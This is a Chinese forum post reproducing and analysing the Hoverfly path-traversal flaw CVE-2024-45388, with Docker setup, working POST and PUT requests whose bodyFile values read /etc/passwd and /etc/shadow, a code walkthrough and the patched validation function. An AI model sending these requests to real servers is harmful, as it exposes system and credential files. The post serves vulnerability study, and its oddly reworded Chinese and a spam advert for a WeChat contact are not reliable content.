怀念夏天 发表于 2024-10-12 23:16:21

Hoverfly 恣意文件读取漏洞(CVE-2024-45388)

漏洞简介

Hoverfly 是一个为开辟人员和测试人员提供的轻量级服务虚拟化/API模拟/API模拟工具。其 /api/v2/simulation​ 的 POST 处理步伐允许用户从用户指定的文件内容中创建新的模拟视图。然而,这一功能大概被攻击者利用来读取 Hoverfly 服务器上的恣意文件。只管代码禁止指定绝对路径,但攻击者可以通过使用 ../​ 段来逃离 hf.Cfg.ResponsesBodyFilesPath​ 基本路径,从而访问任何恣意文件。
环境搭建

我们还是利用 docker 来搭建环境
https://hub.docker.com/r/spectolabs/hoverfly/tags
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202410121702457.png
docker pull spectolabs/hoverfly:v1.10.2
docker run -d -p 8888:8888 -p 8500:8500 spectolabs/hoverfly:v1.10.2   ‍
漏洞复现

构造数据包
POST /api/v2/simulation HTTP/1.1
Host: 127.0.0.1:8888
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8888/dashboard
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 126
Content-Type: application/x-www-form-urlencoded

{"data":{"pairs":[{
"request":{},"response": {
"bodyFile": "../../../../../etc/passwd"}} ]},"meta":{"schemaVersion":"v5.2"}}https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202410121702459.png
PUT /api/v2/simulation HTTP/1.1
Host: 127.0.0.1:8888
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8888/dashboard
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 126
Content-Type: application/x-www-form-urlencoded

{"data":{"pairs":[{
"request":{},"response": {
"bodyFile": "../../../../../etc/shadow"}} ]},"meta":{"schemaVersion":"v5.2"}}https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202410121702460.png
【----资助网安学习,以下所有学习资料免费领!加vx:dctintin,备注 “博客园” 获取!】
 ① 网安学习成长路径头脑导图
 ② 60+网安经典常用工具包
 ③ 100+SRC漏洞分析报告
 ④ 150+网安攻防实战技术电子书
 ⑤ 最权威CISSP 认证考试指南+题库
 ⑥ 超1800页CTF实战本领手册
 ⑦ 最新网安大厂面试题合集(含答案)
 ⑧ APP客户端安全检测指南(安卓+IOS)
漏洞分析

hoverfly-1.10.2\core\handlers\v2\simulation_handler.go#RegisterRoutes
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202410121702461.png
定义了 SimulationHandler​ 的路由注册方法,路由的每个 HTTP 方法(如 GET​、PUT​、POST​、DELETE​ 等)都有一个对应的处理函数 (this.Get​、this.Put​、this.Post​、this.Delete​、this.Options​、this.GetSchema​)。这些函数处理现实的业务逻辑。

[*]GET /api/v2/simulation: 处理获取模拟数据。
[*]PUT /api/v2/simulation: 处理更新模拟数据。
[*]POST /api/v2/simulation: 处理创建新的模拟数据。
[*]DELETE /api/v2/simulation: 处理删除模拟数据。
[*]OPTIONS /api/v2/simulation: 提供有关 /api/v2/simulation​ 端点允许的 HTTP 方法的信息。
[*]GET /api/v2/simulation/schema: 获取模拟数据的 schema(结构)。
[*]OPTIONS /api/v2/simulation/schema: 提供有关 /api/v2/simulation/schema​ 端点允许的 HTTP 方法的信息。
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202410121702462.png
POST 和 PUT 方法 仅仅是函数的第三个参数有所不同,以是两种请求方式都可以实现恣意文件读取
hoverfly-1.10.2\core\handlers\v2\simulation_handler.go#addSimulation
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202410121702463.png
第三个参数的不同导致 PUT 方法在获取新的模子内容时,起首删除前一个模拟内容,可以重复读取不同文件内容。POST 仅仅只能读取一次文件内容,无法更新。
hoverfly-1.10.2\core\hoverfly_service.go#PutSimulation
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202410121702464.png
hoverfly-1.10.2\core\hoverfly_service.go#putOrReplaceSimulation
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202410121702465.png
hoverfly-1.10.2\core\hoverfly_funcs.go#readResponseBodyFiles
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202410121702466.png
hoverfly-1.10.2\core\hoverfly_funcs.go#readResponseBodyFile
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202410121702467.png
这里就是漏洞产生的关键缘故原由,对传入的参数 filePath 没有做详细的校验,可以通过 ../​ 实现跨越目录的读取文件
我们看到最新版已经对传入的参数举行了处理
hoverfly-1.10.4\core\hoverfly_funcs.go#readResponseBodyFile
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202410121702468.png
hoverfly-1.10.4\core\util\util.go#ResolveAndValidatePath
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202410121702469.png
这个 ResolveAndValidatePath​ 函数用于从一个绝对路径(absBasePath​)解析一个相对路径(relativePath​),并验证这个相对路径是否合法。详细来说,它确保了相对路径不会实验向上回溯(使用 ".."​),而且解析后的路径仍然在基路径之下。
更多网安技能的在线实练习习,请点击这里>>
  

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页: [1]
查看完整版本: Hoverfly 恣意文件读取漏洞(CVE-2024-45388)